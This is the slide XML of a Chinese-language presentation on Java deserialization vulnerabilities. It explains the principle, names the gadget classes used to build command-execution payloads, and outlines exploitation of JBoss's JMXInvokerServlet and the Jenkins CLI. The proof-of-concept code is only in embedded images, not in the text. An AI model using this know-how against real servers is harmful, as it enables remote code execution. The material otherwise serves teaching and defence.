              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>java序列化就是把对象转换成字节流，便于保存在内存、文件、数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>据库中；反序列化即逆过程，由字节流还原成对象。当反序列化的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>输入来源于程序外部，可以被用户控制，恶意用户便可以构造恶意</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的字节流，经反序列化之后得到精心构造的恶意对象。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092835" y="2543175"/>
            <a:ext cx="5457190" cy="2457450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞原理:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>那么问题来了，如何构造能执行任意命令的payload？需要依赖于</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么条件？ 哪些应用会在网络中传输序列化的数据？这些数据有</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>什么特征？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>序列化与反序列化原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771650" y="914400"/>
            <a:ext cx="5600065" cy="331406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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>举个栗子</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>Enumeration e = request.getHeaderNames();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>while (e.hasMoreElements()) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>    String name = (String) e.nextElement();//获取key</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>    String value = request.getHeader(name);//得到对应的值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>    out.println(name + "=" + value + "&lt;br&gt;");//输出如cookie=123</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>}     </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞原理:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造执行任意命令的payload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2352040" y="586105"/>
            <a:ext cx="5514340" cy="3971290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞原理:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>构造执行任意命令的payload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1730375"/>
            <a:ext cx="5390515" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739005" y="1201420"/>
            <a:ext cx="3618865" cy="25336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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞原理:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码执行关键点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AnnotationInvocationHandler，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>TransformedMap.decorate，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>InvokerTransformer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞原理:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload的构造与触发流程如图所示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515110" y="1758315"/>
            <a:ext cx="5342890" cy="2885440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jboss下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jboss的问题存在于/invoker/JMXInvokerServlet ，利用比较简单</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>直接发送payload即可</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POC代码如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2719070" y="2137410"/>
            <a:ext cx="5200015" cy="1571625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2367280" y="890905"/>
            <a:ext cx="4409440" cy="336169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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins有远程接口调用的地方存在jenkins-cli.jar对远程命令的下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发处。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1834515"/>
            <a:ext cx="5457190" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1）客户端向服务器请求端口列表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="2276475"/>
            <a:ext cx="7939405" cy="850265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java反序列化漏洞</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Jenkins下的利用：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过抓包分析出交互流程如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2）服务器返回一些端口列表</a:t>
            </a:r>
